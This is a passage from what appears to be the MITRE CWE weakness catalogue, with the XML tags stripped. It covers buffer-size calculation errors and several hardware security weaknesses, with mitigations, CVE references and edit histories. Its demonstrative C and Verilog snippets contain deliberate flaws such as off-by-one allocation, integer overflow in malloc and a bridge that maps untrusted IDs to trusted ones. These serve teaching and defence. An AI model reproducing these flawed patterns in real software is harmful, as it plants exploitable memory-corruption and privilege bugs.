the numeric representation. + + + + Implementation + Input Validation + Perform input validation on any numeric input by ensuring that it is within the expected range. Enforce that the input meets both the minimum and maximum requirements for the expected range. + + + Architecture and Design + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + + + Implementation + When processing structured incoming data containing a size field followed by raw data, identify and resolve any inconsistencies between the size field and the actual size of the data (CWE-130). + + + Implementation + When allocating memory that uses sentinels to mark the end of a data structure - such as NUL bytes in strings - make sure you also include the sentinel in your calculation of the total amount of memory that must be allocated. + + + Implementation + Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available. + Moderate + This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131). Additionally, this only addresses potential overflow issues. Resource consumption / exhaustion issues are still possible. + + + Implementation + Use sizeof() on the appropriate data type to avoid CWE-467. + + + Implementation + Use the appropriate type for the desired action. For example, in C/C++, only use unsigned types for values that could never be negative, such as height, width, or other numbers related to quantity. This will simplify validation and will reduce surprises related to unexpected casting. + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + Use libraries or frameworks that make it easier to handle numbers without unexpected consequences, or buffer allocation routines that automatically track buffer size. + Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++). [REF-106] + + + + Operation + Build and Compilation + Environment Hardening + + Use automatic buffer overflow detection mechanisms that are offered by certain compilers or compiler extensions. Examples include: the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice, which provide various mechanisms including canary-based detection and range/index checking. + D3-SFCV (Stack Frame Canary Validation) from D3FEND [REF-1334] discusses canary-based detection in detail. + + + Defense in Depth + + This is not necessarily a complete solution, since these mechanisms only detect certain types of overflows. In addition, the result is still a denial of service, since the typical response is to exit the application. + + + + Operation + Build and Compilation + Environment Hardening + + Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code. + Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. Imported modules may be similarly realigned if their default memory addresses conflict with other modules, in a process known as "rebasing" (for Windows) and "prelinking" (for Linux) [REF-1332] using randomly generated addresses. ASLR for libraries cannot be used in conjunction with prelink since it would require relocating the libraries at run-time, defeating the whole purpose of prelinking. + For more information on these techniques see D3-SAOR (Segment Address Offset Randomization) from D3FEND [REF-1335]. + + Defense in Depth + These techniques do not provide a complete solution. For instance, exploits frequently use a bug that discloses memory addresses in order to maximize reliability of code execution [REF-1337]. It has also been shown that a side-channel attack can bypass ASLR [REF-1333] + + + Operation + Environment Hardening + + Use a CPU and operating system that offers Data Execution Protection (using hardware NX or XD bits) or the equivalent techniques that simulate this feature in software, such as PaX [REF-60] [REF-61]. These techniques ensure that any instruction executed is exclusively at a memory address that is part of the code segment. + For more information on these techniques see D3-PSEP (Process Segment Execution Prevention) from D3FEND [REF-1336]. + + Defense in Depth + This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application. + + + Implementation + Compilation or Build Hardening + Examine compiler warnings closely and eliminate problems with potential security implications, such as signed / unsigned mismatch in memory operations, or use of uninitialized variables. Even if the weakness is rarely exploitable, a single failure may lead to the compromise of the entire system. + + + Architecture and Design + Operation + Environment Hardening + Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. + + + Architecture and Design + Operation + Sandbox or Jail + + Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. + OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. + This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. + Be careful to avoid CWE-243 and other weaknesses related to jails. + + Limited + The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. + + + + + The following code allocates memory for a maximum number of widgets. It then gets a user-specified number of widgets, making sure that the user does not request too many. It then initializes the elements of the array using InitializeWidget(). Because the number of widgets can vary for each request, the code inserts a NULL pointer to signify the location of the last widget. + + int i;unsigned int numWidgets;Widget **WidgetList; + numWidgets = GetUntrustedSizeValue();if ((numWidgets == 0) || (numWidgets > MAX_NUM_WIDGETS)) {ExitError("Incorrect number of widgets requested!");}WidgetList = (Widget **)malloc(numWidgets * sizeof(Widget *));printf("WidgetList ptr=%p\n", WidgetList);for(i=0; i<numWidgets; i++) {WidgetList[i] = InitializeWidget();}WidgetList[numWidgets] = NULL;showWidgets(WidgetList); + + However, this code contains an off-by-one calculation error (CWE-193). It allocates exactly enough space to contain the specified number of widgets, but it does not include the space for the NULL pointer. As a result, the allocated buffer is smaller than it is supposed to be (CWE-131). So if the user ever requests MAX_NUM_WIDGETS, there is an out-of-bounds write (CWE-787) when the NULL is assigned. Depending on the environment and compilation settings, this could cause memory corruption. + + + The following image processing code allocates a table for images. + + img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);... + + This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119). + + + This example applies an encoding procedure to an input string and stores it into a buffer. + + char * copy_input(char *user_supplied_string){ + int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE <= strlen(user_supplied_string) ){die("user string too long, die evil hacker!");}dst_index = 0;for ( i = 0; i < strlen(user_supplied_string); i++ ){ + if( '&' == user_supplied_string[i] ){dst_buf[dst_index++] = '&';dst_buf[dst_index++] = 'a';dst_buf[dst_index++] = 'm';dst_buf[dst_index++] = 'p';dst_buf[dst_index++] = ';';}else if ('<' == user_supplied_string[i] ){ + + + /* encode to &lt; */ + + + }else dst_buf[dst_index++] = user_supplied_string[i]; + }return dst_buf; + } + + The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands. + + + The following code is intended to read an incoming packet from a socket and extract one or more headers. + + DataPacket *packet;int numHeaders;PacketHeader *headers; + sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet->headers; + if (numHeaders > 100) {ExitError("too many headers!");}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers); + + The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow. + + + The following code attempts to save three different identification numbers into an array. The array is allocated from memory using a call to malloc(). + + int *id_sequence; + + /* Allocate space for an array of three ids. */ + + + id_sequence = (int*) malloc(3);if (id_sequence == NULL) exit(1); + + /* Populate the id array. */ + + + id_sequence[0] = 13579;id_sequence[1] = 24680;id_sequence[2] = 97531; + + The problem with the code above is the value of the size parameter used during the malloc() call. It uses a value of '3' which by definition results in a buffer of three bytes to be created. However the intention was to create a buffer that holds three ints, and in C, each int requires 4 bytes worth of memory, so an array of 12 bytes is needed, 4 bytes for each int. Executing the above code could result in a buffer overflow as 12 bytes of data is being saved into 3 bytes worth of allocated space. The overflow would occur during the assignment of id_sequence[0] and would continue with the assignment of id_sequence[1] and id_sequence[2]. + The malloc() call could have used '3*sizeof(int)' as the value for the size parameter in order to allocate the correct amount of space required to store the three ints. + + + + + CVE-2020-17087 + Chain: integer truncation (CWE-197) causes small buffer allocation (CWE-131) leading to out-of-bounds write (CWE-787) in kernel pool, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-17087 + + + CVE-2004-1363 + substitution overflow: buffer overflow using environment variables that are expanded after the length check is performed + https://www.cve.org/CVERecord?id=CVE-2004-1363 + + + CVE-2004-0747 + substitution overflow: buffer overflow using expansion of environment variables + https://www.cve.org/CVERecord?id=CVE-2004-0747 + + + CVE-2005-2103 + substitution overflow: buffer overflow using a large number of substitution strings + https://www.cve.org/CVERecord?id=CVE-2005-2103 + + + CVE-2005-3120 + transformation overflow: product adds extra escape characters to incoming data, but does not account for them in the buffer length + https://www.cve.org/CVERecord?id=CVE-2005-3120 + + + CVE-2003-0899 + transformation overflow: buffer overflow when expanding ">" to "&gt;", etc. + https://www.cve.org/CVERecord?id=CVE-2003-0899 + + + CVE-2001-0334 + expansion overflow: buffer overflow using wildcards + https://www.cve.org/CVERecord?id=CVE-2001-0334 + + + CVE-2001-0248 + expansion overflow: long pathname + glob = overflow + https://www.cve.org/CVERecord?id=CVE-2001-0248 + + + CVE-2001-0249 + expansion overflow: long pathname + glob = overflow + https://www.cve.org/CVERecord?id=CVE-2001-0249 + + + CVE-2002-0184 + special characters in argument are not properly expanded + https://www.cve.org/CVERecord?id=CVE-2002-0184 + + + CVE-2004-0434 + small length value leads to heap overflow + https://www.cve.org/CVERecord?id=CVE-2004-0434 + + + CVE-2002-1347 + multiple variants + https://www.cve.org/CVERecord?id=CVE-2002-1347 + + + CVE-2005-0490 + needs closer investigation, but probably expansion-based + https://www.cve.org/CVERecord?id=CVE-2005-0490 + + + CVE-2004-0940 + needs closer investigation, but probably expansion-based + https://www.cve.org/CVERecord?id=CVE-2004-0940 + + + CVE-2008-0599 + Chain: Language interpreter calculates wrong buffer size (CWE-131) by using "size = ptr ? X : Y" instead of "size = (ptr ? X : Y)" expression. + https://www.cve.org/CVERecord?id=CVE-2008-0599 + + + + + Other length calculation error + + + INT30-C + Ensure that unsigned integer operations do not wrap + Imprecise + + + MEM35-C + Allocate sufficient memory for an object + CWE More Abstract + + + + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + This is a broad category. Some examples include: + + simple math errors, + incorrectly updating parallel counters, + not accounting for size differences when "transforming" one input to another format (e.g. URL canonicalization or other transformation that can generate a result that's larger than the original input, i.e. "expansion"). + + This level of detail is rarely available in public reports, so it is difficult to find good examples. + + + This weakness may be a composite or a chain. It also may contain layering or perspective differences. + This issue may be associated with many different types of incorrect calculations (CWE-682), although the integer overflow (CWE-190) is probably the most prevalent. This can be primary to resource consumption problems (CWE-400), including uncontrolled memory allocation (CWE-789). However, its relationship with out-of-bounds buffer access (CWE-119) must also be considered. + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Maintenance_Notes, Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2008-10-14 + updated Relationships + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-12-28 + updated Demonstrative_Examples, Likelihood_of_Exploit, Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-02-16 + updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Maintenance_Notes, Potential_Mitigations, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Detection_Factors, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2013-07-17 + updated References + + + CWE Content Team + MITRE + 2014-02-18 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Other Length Calculation Error + + + + Missing an ability to patch ROM code may leave a System or System-on-Chip (SoC) in a vulnerable state. + + A System or System-on-Chip (SoC) that implements a boot process utilizing security mechanisms such as Root-of-Trust (RoT) typically starts by executing code from a Read-only-Memory (ROM) component. The code in ROM is immutable, hence any security vulnerabilities discovered in the ROM code can never be fixed for the systems that are already in use. + + A common weakness is that the ROM does not have the ability to patch if security vulnerabilities are uncovered after the system gets shipped. This leaves the system in a vulnerable state where an adversary can compromise the SoC. + + + + + + + + + + + + + Architecture and Design + This issue could be introduced during hardware architecture and design and can be identified later during Testing. + + + Implementation + This issue could be introduced during implementation and can be identified later during Testing. + + + Integration + This issue could be introduced during integration and can be identified later during Testing. + + + Manufacturing + This issue could be introduced during manufacturing and can be identified later during Testing. + + + + + Other + Varies by Context + Reduce Maintainability + High + When the system is unable to be patched, it can be left in a vulnerable state. + + + + + Architecture and Design + Implementation + + Secure patch support to allow ROM code to be patched on the next boot. + + Moderate + + Some parts of the hardware initialization or signature verification done to authenticate patches will always be "not patchable." + + + + Architecture and Design + Implementation + + Support patches that can be programmed in-field or during manufacturing through hardware fuses. This feature can be used for limited patching of devices after shipping, or for the next batch of silicon devices manufactured, without changing the full device ROM. + + Moderate + + Patches that use hardware fuses will have limitations in terms of size and the number of patches that can be supported. Note that some parts of the hardware initialization or signature verification done to authenticate patches will always be "not patchable." + + + + + + + A System-on-Chip (SOC) implements a Root-of-Trust (RoT) in ROM to boot secure code. However, at times this ROM code might have security vulnerabilities and need to be patched. Since ROM is immutable, it can be impossible to patch. + + ROM does not have built-in application-programming interfaces (APIs) to patch if the code is vulnerable. Implement mechanisms to patch the vulnerable ROM code. + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Narasimha Kumar V Mangipudi + Intel Corporation + 2020-04-25 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2021-07-20 + updated Demonstrative_Examples, Maintenance_Notes + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms, Common_Consequences, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Jason Fung + Intel + 2022-09-07 + suggested removal of incorrect references + + + + + The bridge incorrectly translates security attributes from either trusted to untrusted or from untrusted to trusted when converting from one fabric protocol to another. + + A bridge allows IP blocks supporting different fabric protocols to be integrated into the system. Fabric end-points or interfaces usually have dedicated signals to transport security attributes. For example, HPROT signals in AHB, AxPROT signals in AXI, and MReqInfo and SRespInfo signals in OCP. + The values on these signals are used to indicate the security attributes of the transaction. These include the immutable hardware identity of the controller initiating the transaction, privilege level, and type of transaction (e.g., read/write, cacheable/non-cacheable, posted/non-posted). + A weakness can arise if the bridge IP block, which translates the signals from the protocol used in the IP block endpoint to the protocol used by the central bus, does not properly translate the security attributes. As a result, the identity of the initiator could be translated from untrusted to trusted or vice-versa. This could result in access-control bypass, privilege escalation, or denial of service. + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Integrity + Access Control + Modify Memory + Read Memory + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Execute Unauthorized Code or Commands + + + + + Architecture and Design + The translation must map signals in such a way that untrusted agents cannot map to trusted agents or vice-versa. + + + Implementation + Ensure that the translation maps signals in such a way that untrusted agents cannot map to trusted agents or vice-versa. + + + + + + The bridge interfaces between OCP and AHB end points. OCP uses MReqInfo signal to indicate security attributes, whereas AHB uses HPROT signal to indicate the security attributes. The width of MReqInfo can be customized as needed. In this example, MReqInfo is 5-bits wide and carries the privilege level of the OCP controller. + The values 5'h11, 5'h10, 5'h0F, 5'h0D, 5'h0C, 5'h0B, 5'h09, 5'h08, 5'h04, and 5'h02 in MReqInfo indicate that the request is coming from a privileged state of the OCP bus controller. Values 5'h1F, 5'h0E, and 5'h00 indicate untrusted, privilege state. + Though HPROT is a 5-bit signal, we only consider the lower, two bits in this example. HPROT values 2'b00 and 2'b10 are considered trusted, and 2'b01 and 2'b11 are considered untrusted. + The OCP2AHB bridge is expected to translate trusted identities on the controller side to trusted identities on the responder side. Similarly, it is expected to translate untrusted identities on the controller side to untrusted identities on the responder side. + + + module ocp2ahb + ( + + ahb_hprot, + ocp_mreqinfo + + ); + + output [1:0] ahb_hprot; // output is 2 bit signal for AHB HPROT + input [4:0] ocp_mreqinfo; // input is 5 bit signal from OCP MReqInfo + wire [6:0] p0_mreqinfo_o_temp; // OCP signal that transmits hardware identity of bus controller + + wire y; + + reg [1:0] ahb_hprot; + + // hardware identity of bus controller is in bits 5:1 of p0_mreqinfo_o_temp signal + assign p0_mreqinfo_o_temp[6:0] = {1'b0, ocp_mreqinfo[4:0], y}; + + always @* + begin + + case (p0_mreqinfo_o_temp[4:2]) + + 000: ahb_hprot = 2'b11; // OCP MReqInfo to AHB HPROT mapping + 001: ahb_hprot = 2'b00; + 010: ahb_hprot = 2'b00; + 011: ahb_hprot = 2'b01; + 100: ahb_hprot = 2'b00; + 101: ahb_hprot = 2'b00; + 110: ahb_hprot = 2'b10; + 111: ahb_hprot = 2'b00; + + endcase + + end + endmodule + + Logic in the case statement only checks for MReqInfo bits 4:2, i.e., hardware-identity bits 3:1. When ocp_mreqinfo is 5'h1F or 5'h0E, p0_mreqinfo_o_temp[2] will be 1. As a result, untrusted IDs from OCP 5'h1F and 5'h0E get translated to trusted ahb_hprot values 2'b00. + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Manna + Intel Corporation + 2020-05-24 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Hareesh Khattri + Intel Corporation + 2022-04-28 + Corrections in the demonstrative example. + + + + + The firewall in an on-chip fabric protects the main addressed region, but it does not protect any mirrored memory or memory-mapped-IO (MMIO) regions. + + Few fabrics mirror memory and address ranges, where mirrored regions contain copies of the original data. This redundancy is used to achieve fault tolerance. Whatever protections the fabric firewall implements for the original region should also apply to the mirrored regions. If not, an attacker could bypass existing read/write protections by reading from/writing to the mirrored regions to leak or corrupt the original data. + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Integrity + Access Control + Modify Memory + Read Memory + Bypass Protection Mechanism + + + + + Manual Dynamic Analysis + Using an external debugger, send write transactions to mirrored regions to test if original, write-protected regions are modified. Similarly, send read transactions to mirrored regions to test if the original, read-protected signals can be read. + High + + + + + Architecture and Design + The fabric firewall should apply the same protections as the original region to the mirrored regions. + + + Implementation + The fabric firewall should apply the same protections as the original region to the mirrored regions. + + + + + A memory-controller IP block is connected to the on-chip fabric in a System on Chip (SoC). The memory controller is configured to divide the memory into four parts: one original and three mirrored regions inside the memory. The upper two bits of the address indicate which region is being addressed. 00 indicates the original region and 01, 10, and 11 are used to address the mirrored regions. All four regions operate in a lock-step manner and are always synchronized. The firewall in the on-chip fabric is programmed to protect the assets in the memory. + The firewall only protects the original range but not the mirrored regions. + The attacker (as an unprivileged user) sends a write transaction to the mirrored region. The mirrored region has an address with the upper two bits set to "10" and the remaining bits of the address pointing to an asset. The firewall does not block this write transaction. Once the write is successful, contents in the protected-memory region are also updated. Thus, the attacker can bypass existing, memory protections. + Firewall should protect mirrored regions. + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati K. Manna + Intel Corporation + 2020-06-01 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2021-10-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + During runtime, the hardware allows for test or debug logic (feature) to be activated, which allows for changing the state of the hardware. This feature can alter the intended behavior of the system and allow for alteration and leakage of sensitive data by an adversary. + + An adversary can take advantage of test or debug logic that is made accessible through the hardware during normal operation to modify the intended behavior of the system. For example, an accessible Test/debug mode may allow read/write access to any system data. Using error injection (a common test/debug feature) during a transmit/receive operation on a bus, data may be modified to produce an unintended message. Similarly, confidentiality could be compromised by such features allowing access to secrets. + + + + + + + + + + + + + Architecture and Design + Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases. + + + Implementation + Such issues could be introduced during implementation and identified later during Testing or System Configuration phases. + + + Integration + Such issues could be introduced during integration and identified later during Testing or System configuration phases. + + + + + Confidentiality + Integrity + Availability + Modify Memory + Read Memory + DoS: Crash, Exit, or Restart + DoS: Instability + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + DoS: Resource Consumption (Other) + Execute Unauthorized Code or Commands + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Alter Execution Logic + Quality Degradation + Unexpected State + Reduce Performance + Reduce Reliability + + + + + Architecture and Design + Insert restrictions on when the hardware's test or debug features can be activated. For example, during normal operating modes, the hardware's privileged modes that allow access to such features cannot be activated. Configuring the hardware to only enter a test or debug mode within a window of opportunity such as during boot or configuration stage. The result is disablement of such test/debug features and associated modes during normal runtime operations. + + + Implementation + Insert restrictions on when the hardware's test or debug features can be activated. For example, during normal operating modes, the hardware's privileged modes that allow access to such features cannot be activated. Configuring the hardware to only enter a test or debug mode within a window of opportunity such as during boot or configuration stage. The result is disablement of such test/debug features and associated modes during normal runtime operations. + + + Integration + Insert restrictions on when the hardware's test or debug features can be activated. For example, during normal operating modes, the hardware's privileged modes that allow access to such features cannot be activated. Configuring the hardware to only enter a test or debug mode within a window of opportunity such as during boot or configuration stage. The result is disablement of such test/debug features and associated modes during normal runtime operations. + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Brent Sherman + Accellera IP Security Assurance (IPSA) Working Group + 2020-08-06 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The device does not write-protect the parametric data values for sensors that scale the sensor value, allowing untrusted software to manipulate the apparent result and potentially damage hardware or cause operational failure. + + Various sensors are used by hardware to detect any devices operating outside of the design limits. The threshold limit values are set by hardware fuses or trusted software such as the BIOS. These limits may be related to thermal, power, voltage, current, and frequency. Hardware mechanisms may be used to protect against alteration of the threshold limit values by untrusted software. + The limit values are generally programmed in standard units for the type of value being read. However, the hardware-sensor blocks may report the settings in different units depending upon sensor design and operation. The raw sensor output value is converted to the desired units using a scale conversion based on the parametric data programmed into the sensor. The final converted value is then compared with the previously programmed limits. + While the limit values are usually protected, the sensor parametric data values may not be. By changing the parametric data, safe operational limits may be bypassed. + + + + + + + + + + + + + + Architecture and Design + The lack of a requirement to protect parametric values may contribute to this weakness. + + + Implementation + The lack of parametric value protection may be a cause of this weakness. + + + + + Availability + Quality Degradation + DoS: Resource Consumption (Other) + High + Sensor value manipulation, particularly thermal or power, may allow physical damage to occur or disabling of the device by a false fault shutdown causing a Denial-Of-Service. + + + + + Architecture and Design + Access controls for sensor blocks should ensure that only trusted software is allowed to change threshold limits and sensor parametric data. + High + + + + + + Malicious software executes instructions to increase power consumption to the highest possible level while causing the clock frequency to increase to its maximum value. + Such a program executing for an extended period of time would likely overheat the device, possibly resulting in permanent damage to the device. + + A ring, oscillator-based temperature sensor will generally report the sensed value as + oscillator frequency rather than degrees centigrade. The temperature sensor will have + calibration values that are used to convert the detected frequency into the corresponding temperature in degrees centigrade. + + Consider a SoC design where the critical maximum temperature limit is set in fuse values to 100C and + is not modifiable by software. If the scaled thermal sensor output equals or exceeds this limit, the system is commanded to shut itself down. + + The thermal sensor calibration values are programmable through registers that are exposed to system software. + These registers allow software to affect the converted temperature output such that the output will never exceed the maximum temperature limit. + + + The sensor frequency value is scaled by applying the function: + Sensed Temp = a + b * Sensor Freq + where a and b are the programmable calibration data coefficients. Software sets a and b to zero ensuring the sensed + temperature is always zero. + + This weakness may be addressed by preventing access to a and b. + + The sensor frequency value is scaled by applying the function: + Sensed Temp = a + b * Sensor Freq + where a and b are the programmable calibration data coefficients. Untrusted software is prevented from changing the values of either a or b, + preventing this method of manipulating the temperature. + + + + + + CVE-2017-8252 + Kernel can inject faults in computations during the execution of TrustZone leading to information disclosure in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice and Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking. + https://www.cve.org/CVERecord?id=CVE-2017-8252 + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Hareesh Khattri, Parbati K. Manna, and Arun Kanuparthi + The Intel Corporation + 2020-07-14 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The bus controller enables bits in the fabric end-point to allow responder devices to control transactions on the fabric. + + To support reusability, certain fabric interfaces and end points provide a configurable register bit that allows IP blocks connected to the controller to access other peripherals connected to the fabric. This allows the end point to be used with devices that function as a controller or responder. If this bit is set by default in hardware, or if firmware incorrectly sets it later, a device intended to be a responder on a fabric is now capable of controlling transactions to other devices and might compromise system security. + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + System Configuration + + + + + Access Control + Modify Memory + Read Memory + Bypass Protection Mechanism + + + + + Architecture and Design + For responder devices, the register bit in the fabric end-point that enables the bus controlling capability must be set to 0 by default. This bit should not be set during secure-boot flows. Also, writes to this register must be access-protected to prevent malicious modifications to obtain bus-controlling capability. + + + Implementation + For responder devices, the register bit in the fabric end-point that enables the bus 